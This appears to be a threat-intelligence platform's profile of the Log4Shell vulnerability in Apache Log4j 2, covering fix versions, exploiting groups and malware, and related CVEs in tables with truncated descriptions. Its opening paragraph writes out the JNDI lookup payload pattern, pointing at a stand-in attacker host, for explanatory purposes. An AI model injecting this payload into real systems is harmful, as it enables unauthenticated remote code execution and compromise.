Log4Shell

Vulnerability Profile Updated 7 days ago
Log4Shell is a software vulnerability in Apache Log4j 2, the widely used Java logging library. Identified as CVE-2021-44228, it stems from Log4j's message lookup substitution: when a logged string contains a lookup such as ${jndi:ldap://<attacker host>/x}, affected versions (2.0-beta9 through 2.14.1) resolve it through JNDI, retrieve an attacker-supplied Java object from that server and execute it. Because almost any attacker-controlled input can end up in a log line (an HTTP User-Agent header, a username, a chat message), the flaw gives unauthenticated remote code execution and often leads to full system compromise. The first fix in 2.15.0 was incomplete (CVE-2021-45046, addressed in 2.16.0 by removing message lookups entirely), and two further Log4j issues followed: CVE-2021-45105 (fixed in 2.17.0) and CVE-2021-44832 (fixed in 2.17.1). Log4j 1.x is not affected by CVE-2021-44228. Threat actors of every kind, from ransomware affiliates such as LockBit's and the initial-access broker GOLD MELODY (also tracked as UNC961) to state-sponsored APT groups, have exploited it, among other flaws, to gain initial access to victims' systems; these attacks targeted internet-facing systems such as Microsoft Exchange, Fortinet and VMware Horizon servers. On December 15, 2021, the StealthLoader malware was reported to be delivered through Log4Shell. That campaign stood out from typical Log4Shell activity in that it needed roughly 10,000 attempts on average to succeed, generating a considerable amount of network noise; even so, it was among the cybercriminal operations that capitalized on the flaw, demonstrating how broadly it was exploited. In response, various organizations provided support and information sharing to mitigate the fallout: the Joint Cyber Defense Collaborative (JCDC) offered assistance during this period, according to the federal Cyber Safety Review Board, and the Cybersecurity & Infrastructure Security Agency (CISA) published additional resources on mitigating Log4Shell and the related Log4j vulnerabilities. Separately, in a legal dispute between the cloud security vendors Wiz and Orca Security, allegations surfaced that Orca had copied Wiz's infographics and marketing content on topics including Log4Shell.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID | Votes | Profile Description
CVE-2021-44228 | 11 | CVE-2021-44228, also known as the Log4j vulnerability, is a software flaw found in Apache Log4j, a widely used logging utility. Despite multiple attempts by Advanced Persistent Threat (APT) actors to exploit this vulnerability in the ServiceDesk system, these efforts were unsuccessful. However, it b
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Exploit, Log4j, Vulnerability, Apache, exploitation, Exploits, Malware, Ransomware, Remote Code ..., flaw, exploited, Confluence, Lateral Move..., Apt, Operation Bl..., Manageengine, Botnet, RCE (Remote ..., Cisco, Apache Struts, bugs, Reconnaissance, Zero Day, Source, Ofbiz, Secureworks, Phishing, Chrome, Linux, Implant, Payload, Moveit, Iran, Activemq, Vcenter, WinRAR, T1190, Fortios, Redis, Zimbra, Mobileiron C..., Telegram, Esxi, Android, Minecraft, Fortiproxy, Java, Xz, Sonicwall, Korean, CISA, Microsoft, Google, Tenable, Sophos, Talos, ngrok, SBOMs, State Sponso..., Cybercrime, Backdoor, Government, Financial, T1133, M1050, Vpn, Proxy, Vrealize, Qualys, Windows, Firmware, Traversal, Vmware
Associated Malware
ID | Type | Votes | Profile Description
EarlyRat | Unspecified | 2 | EarlyRat is a previously undocumented malware discovered by Kaspersky researchers in June 2023. The North Korea-linked Advanced Persistent Threat (APT) group Andariel used EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability in 2022. The malware was first noticed in one of the Log4j cases,
Kinsing | Unspecified | 2 | Kinsing is a Linux cryptojacking malware. It spreads by exploiting exposed or vulnerable services, including misconfigured Docker and Kubernetes APIs and flaws such as Log4Shell, then installs an XMRig-based Monero miner and kills competing miners on the host.
Dridex | Unspecified | 1 | Dridex is a well-known banking Trojan distributed mainly through malicious email attachments. In December 2021 it was also observed being delivered to Windows hosts through Log4Shell exploitation, and it can steal credentials and other personal information from infected systems.
SUNBURST | Unspecified | 1 | SUNBURST is the backdoor that was inserted into builds of the SolarWinds Orion platform in the 2020 supply-chain compromise. It used DNS-based command and control, encoding victim identifiers in subdomains of its C2 domain, and Kaspersky found code overlaps linking it to the Kazuar backdoor.
AvosLocker | Unspecified | 1 | AvosLocker is a ransomware-as-a-service operation. Its affiliates gain access through exposed remote access services and exploited public-facing applications, encrypt Windows, Linux and VMware ESXi hosts, and extort victims by threatening to leak stolen data.
NineRAT | Unspecified | 1 | NineRAT is a malware strain developed by the Lazarus group and deployed in Operation Blacksmith, a campaign that exploited Log4Shell. Cisco Talos reported that it was built around May 2022, first observed in March 2023 against a South American agricultural organization, and used again in September 2023 against a European manufacturing entity.
XMRig | Unspecified | 1 | XMRig is an open-source Monero CPU miner. It is not malicious in itself, but it is the payload most commonly dropped by cryptojacking campaigns, including many of the first mass exploitation waves against Log4Shell.
Conti | Unspecified | 1 | Conti is a ransomware operation known for disrupting operations, stealing data and holding it hostage for ransom. In December 2021 its operators were reported to be exploiting Log4Shell on VMware vCenter servers for lateral movement inside already compromised networks.
LockBit | Unspecified | 1 | LockBit is a ransomware-as-a-service operation whose affiliates have used Log4Shell, among other flaws in internet-facing systems, for initial access before stealing data, encrypting systems and extorting victims.
PowerStar | Unspecified | 1 | PowerStar is a malicious software (malware) deployed by the Iranian Advanced Persistent Threat (APT) group known as Charming Kitten, also referred to as APT35, Mint Sandstorm, Cobalt Illusion, and Yellow Garuda. This malware was used in a series of spear-phishing attacks launched by the group since
Clop | Unspecified | 1 | Clop is a ransomware and extortion operation known for mass exploitation of zero-day vulnerabilities in file-transfer products (Accellion FTA, GoAnywhere MFT and MOVEit Transfer) to steal data from many organizations at once and extort them.
Associated Threat Actors
ID | Type | Votes | Profile Description
Lazarus Group | Unspecified | 4 | The Lazarus Group, a notorious threat actor believed to be linked to North Korea, has been attributed with a series of significant cyber-attacks over the past few years. The group's malicious activities include the exploitation of digital infrastructure, stealing cryptocurrency, and executing large-
Andariel | Unspecified | 3 | Andariel, a notorious threat actor associated with the Lazarus Group and linked to North Korea, is known for its malicious cyber activities. The group has been identified using DTrack malware and Maui ransomware, notably in mid-2022, and has developed a reputation for exploiting ActiveX objects. Res
APT41 | Unspecified | 1 | APT41, also known as Winnti, Wicked Panda, and Wicked Spider, is a sophisticated threat actor attributed to China. This group has been active since at least 2012, targeting organizations across 14 countries. The group is known for its extensive use of various code families and tools, with at least 4
Mint Sandstorm | Unspecified | 1 | Mint Sandstorm, an Iranian nation-state threat actor also known as APT35 and Charming Kitten, has been identified by Microsoft as a significant cybersecurity concern. The group is linked to Iran's Islamic Revolutionary Guard Corps and is known for its sophisticated cyber campaigns targeting high-val
MERCURY | Unspecified | 1 | Mercury, also known as MuddyWater and Static Kitten, is a threat actor group linked to global espionage activities, with suspected ties to the Iranian Ministry of Intelligence and Security. This group has been noted for its malicious activities, compromising multiple victims that another group, POLO
Stonefly | Unspecified | 1 | Stonefly, also known as Andariel or Silent Chollima, is a threat actor group believed to be linked with the North Korean government. Active since at least 2015, Stonefly has been involved in numerous attacks, including several attributed to the North Korean state-sponsored operation Lazarus. The gro
MagicLine4NX | Unspecified | 1 | MagicLine4NX is not a threat actor but a South Korean security authentication product. A November 2023 joint advisory from the UK NCSC and the Republic of Korea's NIS reported that the Lazarus Group exploited a zero-day vulnerability in it in a supply-chain attack.
Lapsus | Unspecified | 1 | Lapsus$ is a significant extortion-focused threat actor that has been active since late 2021. The group gained notoriety for its cyberattacks, including a high-profile breach of Nvidia, an American multinational technology company, in February 2022. This attack led to the leak of thousands of passwor
Associated Vulnerabilities
ID | Type | Votes | Profile Description
ProxyShell | Unspecified | 5 | ProxyShell is a critical vulnerability chain affecting Microsoft Exchange email servers. Identified as CVE-2021-34473 (chained with CVE-2021-34523 and CVE-2021-31207), it is a flaw in software design or implementation that can be exploited by attackers to gain unauthorized access to systems. The vulnerability was actively exploited by threat actors, cau
Follina | Unspecified | 3 | Follina, also known as CVE-2022-30190, is a notable software vulnerability that was discovered and exploited in the first half of 2022. This flaw, found in the Microsoft Windows Support Diagnostic Tool (MSDT), was weaponized by TA413, a cyber threat actor group with suspected ties to China. The grou
CVE-2022-30190 | Unspecified | 3 | CVE-2022-30190, also known as the "Follina" vulnerability, is a high-risk software flaw in the Microsoft Support Diagnostic Tool that allows for remote code execution. This 0-day vulnerability was disclosed in May 2022 and has since been exploited by threat actors, including TA413, who weaponized it
CVE-2021-34523 | Unspecified | 2 | (no profile description)
CVE-2017-5638 | Unspecified | 2 | CVE-2017-5638 is a significant vulnerability found in Apache Struts, a widely used open-source framework for developing Java web applications. This flaw in software design or implementation allowed attackers to remotely execute commands on the server running the vulnerable application, leading to po
CVE-2021-26084 | Unspecified | 2 | CVE-2021-26084 is a critical OGNL injection vulnerability in Atlassian Confluence Server and Data Center, disclosed by Atlassian in August 2021 and widely exploited within days (the June 2022 Confluence zero-day is the separate CVE-2022-26134). It allows remote attackers to execute code on a Confluence Server via injection attacks.
CVE-2022-22954 | Unspecified | 2 | CVE-2022-22954 is a significant software vulnerability that affects VMware's Workspace ONE Access and Identity Manager. This flaw in the software design or implementation allows for remote code execution, providing an attacker with the ability to execute arbitrary commands on the affected system. Ov
CVE-2022-1388 | Unspecified | 2 | CVE-2022-1388 is a critical vulnerability identified in the F5 BIG-IP iControl REST interface, which allows for an authentication bypass. This flaw in software design or implementation enables unauthorized users to gain access and control over the system without needing to authenticate their identit
CVE-2022-26134 | Unspecified | 2 | CVE-2022-26134 is a critical software vulnerability that was discovered in Atlassian Confluence Server and Data Center. This flaw, which allows for remote code execution (RCE), was publicly disclosed by Atlassian in June 2022. The Cybersecurity and Infrastructure Security Agency (CISA) recognized th
CVE-2021-45046 | is / was | 2 | CVE-2021-45046 covers the incomplete fix for Log4Shell in Log4j 2.15.0, where certain non-default logging configurations still allowed lookup-based attacks; it was addressed in Log4j 2.16.0 by removing message lookups.
CVE-2021-34473 | Unspecified | 2 | CVE-2021-34473 is a significant software vulnerability that was discovered in Microsoft Exchange Server. This flaw, along with two others (CVE-2021-31207 and CVE-2021-34523), forms a chain of vulnerabilities known as ProxyShell. These vulnerabilities can be exploited together by remote attackers to
CVE-2018-13379 | Unspecified | 2 | CVE-2018-13379 is a critical path traversal vulnerability in the SSL-VPN web portal of Fortinet FortiOS and FortiProxy. It lets an unauthenticated attacker read system files, including the session file that exposes plaintext VPN credentials, and it has been exploited so frequently that it appears on the top routinely exploited vulnerability lists for multiple years.
CVE-2021-31207 | Unspecified | 2 | CVE-2021-31207 is a post-authentication arbitrary file write vulnerability in Microsoft Exchange Server and the third link of the ProxyShell chain (with CVE-2021-34473 and CVE-2021-34523); it does not affect Atlassian Confluence. The Advanced Persistent Threat group APT40 was reported to rapidly exploit this flaw, along with other public vulnerabilities in widely used software such as Log4j (CVE-2021-44228), among others.
CVE-2021-40539 | Unspecified | 2 | (no profile description)
CVE-2022-22960 | Unspecified | 2 | (no profile description)
CVE-2012-1823 | Unspecified | 1 | (no profile description)
CVE-2017-12617 | Unspecified | 1 | (no profile description)
ProxyNotShell | Unspecified | 1 | ProxyNotShell is a software vulnerability, specifically a flaw in the design or implementation of Microsoft Exchange Server, consisting of CVE-2022-41040 (a server-side request forgery) chained with CVE-2022-41082 (remote code execution), as reported by Palo Alto Networks' Unit 42 among others. The ProxyNotShell exploit method leveraged an Autodiscover endpoint t
CVE-2021-44832 | Unspecified | 1 | CVE-2021-44832 is a remote code execution vulnerability in Log4j 2 that applies when an attacker can modify the logging configuration to point a JDBC Appender at an attacker-controlled JNDI data source URI; it was fixed in Log4j 2.17.1.
Citrix Bleed | Unspecified | 1 | Citrix Bleed, identified as CVE-2023-4966, is a severe software vulnerability in Citrix NetScaler Gateway and NetScaler ADC products, with a high CVSS score of 9.4 indicating its critical nature. This flaw allows for sensitive information disclosure, bypassing password requirements and multifactor a
CVE-2023-38831 | Unspecified | 1 | CVE-2023-38831 is a vulnerability in the WinRAR software with a CVSS score of 7.8, indicating high severity. This flaw in software design or implementation has been exploited by the threat actor tracked as UAC-0099 to deliver the LONEPAGE malware through crafted ZIP archives. The vulnerabil
CVE-2022-47966 | Unspecified | 1 | CVE-2022-47966 is a critical vulnerability discovered in Zoho ManageEngine ServiceDesk Plus and other ManageEngine products, widely used IT management software. The flaw was exploited by malicious actors to gain unauthorized access to the organization's systems and networks. The exploitation started just five days after proof-of
CVE-2021-4428 | Unspecified | 1 | (no profile description)
CVE-2021-20038 | Unspecified | 1 | (no profile description)
CVE-2022-24990 | Unspecified | 1 | (no profile description)
CVE-2021-45105 | is / was | 1 | CVE-2021-45105 is a denial-of-service vulnerability in Log4j 2 caused by uncontrolled recursion in self-referential lookups; it was fixed in Log4j 2.17.0.
Meltdown | is related to | 1 | Meltdown is a significant hardware (CPU) vulnerability that was publicly disclosed in January 2018, alongside another threat known as Spectre. These vulnerabilities affected virtually every modern microprocessor and sparked widespread concern due to their potential to expose confidential user data to hackers. Both Meltdo
Spectre | Unspecified | 1 | Spectre is a class of hardware vulnerabilities in the speculative execution of modern CPUs that allows unauthorized access to sensitive data through cache side channels; Spectre-BHB, also called branch history injection (BHI), is a later variant. Disclosed in 2018, it was initially dismissed by some in the semiconductor industry due to its potentia
ProxyShell CVE-2021-34473 | Unspecified | 1 | ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) is a set of three chained vulnerabilities that perform unauthenticated remote code execution (RCE) in Microsoft Exchange. Identified as a significant flaw in software design or implementation, it allows unauthorized users to execute arbitra
CVE-2021-42237 | Unspecified | 1 | CVE-2021-42237 is a software vulnerability discovered in Sitecore XP, a popular content management system. This flaw was one of several exploited by the cybercriminal group known as Gold Melody between July 2020 and July 2022. The group targeted internet-exposed servers, using these vulnerabilities
ProxyLogon | Unspecified | 1 | ProxyLogon is a notable software vulnerability that surfaced in the cybersecurity landscape. It was part of an exploit chain, including CVE-2021-26855, a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server. This flaw allowed attackers to bypass authentication mechanisms and
CVE-2021-26855 | Unspecified | 1 | CVE-2021-26855 is a significant software vulnerability, specifically a zero-day server-side request forgery (SSRF) flaw, found in Microsoft Exchange 2013, 2016, and 2019. This vulnerability was exploited by attackers to gain initial access to email servers and drop an ASPX webshell, leveraging the t
ProxyLogon (CVE-2021-26855 | Unspecified | 1 | (no profile description)
ProxyLogon CVE-2021-26855 | Unspecified | 1 | (no profile description)
CVE-2019-11043 | Unspecified | 1 | (no profile description)
Source Document References
Information about the Log4Shell vulnerability was read from the documents corpus below (this display is limited to 20 results).
Source | Created | Title
Checkpoint | 15 hours ago | 22nd July – Threat Intelligence Report - Check Point Research
Checkpoint | 7 days ago | 15th July – Threat Intelligence Report - Check Point Research
Checkpoint | 15 days ago | 8th July – Threat Intelligence Report - Check Point Research
DARKReading | 21 days ago | 'RegreSSHion' Bug Threatens Takeover of Millions of Linux Systems
Checkpoint | 22 days ago | 1st July – Threat Intelligence Report - Check Point Research
Checkpoint | a month ago | 24th June – Threat Intelligence Report - Check Point Research
Checkpoint | a month ago | 17th June – Threat Intelligence Report - Check Point Research
BankInfoSecurity | a month ago | Ransomware Gang TellYouThePass Exploits PHP Vulnerability
Checkpoint | a month ago | 10th June – Threat Intelligence Report - Check Point Research
BankInfoSecurity | a month ago | CISA Planning JCDC Overhaul as Experts Criticize Slow Start
BankInfoSecurity | 2 months ago | Wiz Counters Orca Security's Patent Infringement Allegations
RIA - Information System Authority | 2 months ago | Trends and Challenges in Cyber Security – Q4 2021
RIA - Information System Authority | 2 months ago | Threat Assessment: Cyber attacks against Ukraine and possible impact in Estonia
Checkpoint | 2 months ago | 3rd June – Threat Intelligence Report - Check Point Research
Checkpoint | 2 months ago | 27th May – Threat Intelligence Report - Check Point Research
Checkpoint | 2 months ago | 20th May – Threat Intelligence Report - Check Point Research
Checkpoint | 2 months ago | 13th May – Threat Intelligence Report - Check Point Research
Checkpoint | 3 months ago | 6th May – Threat Intelligence Report - Check Point Research
Checkpoint | 3 months ago | 29th April – Threat Intelligence Report - Check Point Research
Checkpoint | 3 months ago | 15th April – Threat Intelligence Report - Check Point Research